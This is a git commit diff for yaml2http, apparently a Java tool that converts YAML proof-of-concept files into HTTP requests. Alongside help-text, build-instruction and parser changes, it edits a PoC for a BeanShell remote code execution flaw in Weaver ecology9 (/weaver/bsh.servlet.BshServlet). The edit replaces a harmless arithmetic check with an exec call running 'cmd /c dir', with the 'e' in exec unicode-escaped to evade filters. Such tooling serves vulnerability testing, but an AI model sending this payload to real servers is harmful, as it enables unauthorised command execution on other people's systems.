skip unknown field in yaml

README.md

@@ -28,6 +28,17 @@ Content-Length: 87
 bsh.script=print%2842503*40455%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
 ```
 
+帮助信息
+
+```bash
+java -jar yaml2http-1.0.jar -h
+usage: yaml2http
+ -b,--bytes <arg>   Path to file need to be convert, convert the file
+                    content as bytes value with b"" format.
+ -h,--help          Help info.
+ -p,--path <arg>    Path to poc file.
+```
+
 ### Burp Suite Extension
 
 支持在`Burp Suite`中以插件形式进行使用，这种方式可以避免不可打印字符的问题。
@@ -44,6 +55,23 @@ bsh.script=print%2842503*40455%29&bsh.servlet.captureOutErr=true&bsh.servlet.out
 
 ![](images/20220823113627.png)
 
+## Build
+
+克隆源码到本地
+
+```bash
+git clone https://github.com/trganda/yaml2http
+```
+
+并执行
+
+```bash
+cd yaml2http
+mvn clean compile assembly:single
+```
+
+之后可在`target`目录下查看编译后的`jar`包文件
+
 ## Todo
 
 * [X] 完成`yaml`解析，读取已支持字段值

src/main/java/com/github/trganda/App.java

@@ -16,8 +16,9 @@ public class App {
 
     public static void main(String[] args) throws IOException, ParseException {
         Options options = new Options();
+        options.addOption("h", "help", false, "Help info.");
         options.addOption("p", "path", true, "Path to poc file.");
-        options.addOption("b", "bytes", true, "Path ot file need convert.");
+        options.addOption("b", "bytes", true, "Path to file need to be convert, convert the file content as bytes value with b\"\" format.");
 
         CommandLineParser parser = new DefaultParser();
         CommandLine cmd = parser.parse(options, args);
@@ -40,6 +41,9 @@ public static void main(String[] args) throws IOException, ParseException {
             is.read(buf);
 
             System.out.println(Util.toBytesValue(buf));
+        } else {
+            HelpFormatter formatter = new HelpFormatter();
+            formatter.printHelp("yaml2http", options);
         }
 
     }

src/main/java/com/github/trganda/parser/PocsParser.java

@@ -1,5 +1,6 @@
 package com.github.trganda.parser;
 
+import com.fasterxml.jackson.databind.DeserializationFeature;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import com.fasterxml.jackson.databind.module.SimpleModule;
 import com.fasterxml.jackson.dataformat.yaml.YAMLFactory;
@@ -35,6 +36,8 @@ private void init() {
 
         mapper.registerModule(simpleModule);
         mapper.findAndRegisterModules();
+        // skip unknown field
+        mapper.disable(DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES);
     }
 
     public Pocs readPocs() throws IOException {

yamlpocs/poc-yaml-ecology9-beanshell-rce.yaml

@@ -1,17 +1,16 @@
 name: ecology9-beanshell-rce
 transport: http
 set:
-  r1: randomInt(40000, 44800)
-  r2: randomInt(40000, 44800)
+  r1: b"\x22cmd /c dir\x22"
 rules:
   r0:
     request:
       method: POST
       path: /weaver/bsh.servlet.BshServlet
-      body: bsh.script=print%28{{r1}}*{{r2}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
+      body: bsh.script=ex\u0065c({{r1}});&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
       headers:
         Content-Type: application/x-www-form-urlencoded
-    expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
+    expression: response.status == 200 && response.body.bcontains("<DIR>"))
 expression: r0()
 detail:
   author: trganda